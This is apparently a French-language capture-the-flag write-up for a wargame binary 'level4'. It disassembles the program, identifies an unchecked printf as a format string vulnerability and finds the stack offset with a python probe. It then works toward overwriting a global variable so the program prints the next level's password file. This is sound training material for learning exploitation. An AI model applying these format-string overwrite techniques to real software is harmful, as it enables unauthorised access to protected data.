disas n:
   0x08048457 <+0>:	    push   %ebp
   0x08048458 <+1>: 	mov    %esp,%ebp
   0x0804845a <+3>:	    sub    $0x218,%esp
   0x08048460 <+9>:	    mov    0x8049804,%eax
   0x08048465 <+14>:	mov    %eax,0x8(%esp)
   0x08048469 <+18>:	movl   $0x200,0x4(%esp)
   0x08048471 <+26>:	lea    -0x208(%ebp),%eax
   0x08048477 <+32>:	mov    %eax,(%esp)
   0x0804847a <+35>:	call   0x8048350 <fgets@plt>
   0x0804847f <+40>:	lea    -0x208(%ebp),%eax
   0x08048485 <+46>:	mov    %eax,(%esp)
   0x08048488 <+49>:	call   0x8048444 <p> -> sous fonction p
   0x0804848d <+54>:	mov    0x8049810,%eax -> x/s 0x8049810 : 
                                    0x8049810 <m>:	0x00000000 -> string vide
   0x08048492 <+59>:	cmp    $0x1025544,%eax -> une comparaison m == 0x1025544
   0x08048497 <+64>:	jne    0x80484a5 <n+78>
   0x08048499 <+66>:	movl   $0x8048590,(%esp) -> x/s 0x8048590 : 
                                0x8048590:	 "/bin/cat /home/user/level5/.pass" 
                                -> ce qui est envoyé dans l'appel system
   0x080484a0 <+73>:	call   0x8048360 <system@plt> -> appel systeme
   0x080484a5 <+78>:	leave  
   0x080484a6 <+79>:	ret 

disas p:
   0x08048444 <+0>:	    push   %ebp
   0x08048445 <+1>:	    mov    %esp,%ebp
   0x08048447 <+3>:	    sub    $0x18,%esp
   0x0804844a <+6>:	    mov    0x8(%ebp),%eax
   0x0804844d <+9>:	    mov    %eax,(%esp)
   0x08048450 <+12>:	call   0x8048340 <printf@plt> -> exploitable
   0x08048455 <+17>:	leave  
   0x08048456 <+18>:	ret

C´est aussi une format string attack !

On check la position du buffer :
python -c 'print "AAAA"+" %x"*20' | ./level4
AAAA b7ff26b0 bffff794 b7fd0ff4 0 0 bffff758 804848d bffff550 200 b7fd1ac0 b7ff37d0 
41414141 20782520 25207825 78252078 20782520 25207825 78252078 20782520 25207825

Il est en 12eme position =)

On va donc utiliser quasiment le même exploit que dans le lvl3.
On essaie de mettre 16930116 dans m en premier :
(gdb) x 0x8049810
0x8049810 <m>:	0x0102554c -> on obtient un resultat proche mais pas le bon.

Apres quelque ajustement on va ajouter 16930108 dans m.